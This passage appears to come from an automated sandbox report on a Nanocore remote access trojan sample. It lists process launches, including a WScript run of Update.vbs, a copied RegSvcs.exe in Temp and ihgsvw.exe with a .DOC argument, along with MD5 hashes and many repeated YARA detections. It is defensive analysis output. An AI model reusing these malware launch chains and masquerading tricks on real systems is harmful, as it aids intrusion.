              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:27
              Start time:17:52:41
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:28
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x950000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:29
              Start time:17:52:44
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:32
              Start time:17:52:55
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xf30000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:33
              Start time:17:52:56
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:34
              Start time:17:53:05
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:35
              Start time:17:53:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:36
              Start time:17:53:12
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7b0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:37
              Start time:17:53:20
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Disassembly

              No disassembly